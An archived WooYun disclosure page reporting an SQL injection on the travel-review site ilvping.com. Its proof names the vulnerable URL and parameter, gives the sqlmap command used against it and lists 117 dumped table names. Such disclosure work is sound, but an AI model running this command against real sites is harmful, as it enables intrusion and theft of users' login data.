当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-093960
漏洞标题:
旅评网存在SQL注入漏洞(可能泄露qq账号等登陆信息)
相关厂商:
旅评网
漏洞作者:
感染者
提交时间:
2015-01-26 10:14
修复时间:
2015-03-12 10:14
公开时间:
2015-03-12 10:14
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-01-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

旅评网存在SQL注入漏洞(可能泄露qq账号等登陆信息)

详细说明:

旅评网SQL注入漏洞,导致大量信息泄露(可以用qq账号登陆!!!)

漏洞证明:

地址:http://www.ilvping.com/activity/Activity/hard/hard.html?aid=hlvote
sqlmap -u http://www.ilvping.com/activity/Activity/hard/hard.html?aid=hlvote --dbs

1.png


2.png


23.png


Database: ilvping
[117 tables]
+-----------------------------+
| ilv_rectif|                 |
| ilv_weibo_atme\x03          |
| ilv_weibo_plugin\x03        |
| user                        |
| ilv_activity                |
| ilv_activity_photo          |
| ilv_activity_voters         |
| ilv_activity_work_votes     |
| ilv_activity_works          |
| ilv_ad                      |
| ilv_addons                  |
| ilv_admin_log               |
| ilv_app                     |
| ilv_area                    |
| ilv_attach                  |
| ilv_category                |
| ilv_comment                 |
| ilv_comment_count           |
| ilv_comment_count_fitcrowd  |
| ilv_comment_deleted         |
| ilv_comment_set             |
| ilv_credit_setting          |
| ilv_credit_type             |
| ilv_credit_user             |
| ilv_denounce                |
| ilv_destina                 |
| ilv_destina_cat             |
| ilv_destina_comment_count   |
| ilv_destina_img             |
| ilv_destina_question_link   |
| ilv_destina_set             |
| ilv_document                |
| ilv_el_area                 |
| ilv_el_hotel                |
| ilv_emigrated               |
| ilv_emigrated_result        |
| ilv_expression              |
| ilv_feed                    |
| ilv_food                    |
| ilv_fun                     |
| ilv_gone                    |
| ilv_index_maparea           |
| ilv_invite_record           |
| ilv_invitecode              |
| ilv_link                    |
| ilv_login                   |
| ilv_login_record            |
| ilv_medal                   |
| ilv_message_content         |
| ilv_message_list            |
| ilv_message_member          |
| ilv_node                    |
| ilv_notify                  |
| ilv_path                    |
| ilv_path_back               |
| ilv_path_photo              |
| ilv_path_sub                |
| ilv_path_sub_back           |
| ilv_plan_question_link      |
| ilv_pug                     |
| ilv_question                |
| ilv_question_cat            |
| ilv_questionnaire           |
| ilv_questionnaire_user      |
| ilv_response                |
| ilv_response_reply          |
| ilv_space                   |
| ilv_special                 |
| ilv_system_data             |
| ilv_tactic                  |
| ilv_taxi                    |
| ilv_taxi_price              |
| ilv_template                |
| ilv_template_record         |
| ilv_travel_nlan             |
| ilv_travel_notes            |
| ilv_travel_notes_photo      |
| ilv_travel_plan_proposal    |
| ilv_travel_pqan_detail      |
| ilv_tv_question             |
| ilv_tv_user                 |
| ilv_useful                  |
| ilv_user                    |
| ilv_user_blacklist          |
| ilv_user_count              |
| ilv_user_data               |
| ilv_user_group              |
| ilv_user_group_link         |
| ilv_user_group_popedom      |
| ilv_user_medal              |
| ilv_user_online             |
| ilv_user_privacy            |
| ilv_user_profile            |
| ilv_user_set                |
| ilv_user_visited            |
| ilv_validation              |
| ilv_video                   |
| ilv_video_highlights        |
| ilv_video_reply             |
| ilv_vote                    |
| ilv_vote_opt                |
| ilv_vote_useu               |
| ilv_wantgo                  |
| ilv_weibo                   |
| ilv_weibo_attach            |
| ilv_weibo_comment           |
| ilv_weibo_favorite          |
| ilv_weibo_follow            |
| ilv_weibo_follow_group      |
| ilv_weibo_follow_group_link |
| ilv_weibo_star              |
| ilv_weibo_star_group        |
| ilv_weibo_topic             |
| ilv_weibo_topic_link        |
| ilv_weibo_topics            |
| ilv_werks                   |
| ilv_works_photo             |
+-----------------------------+


由于电脑配置问题出不来了

34.png

修复方案:

应当注意这里是 AND/OR time-based blind的注入

版权声明:转载请注明来源 感染者@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝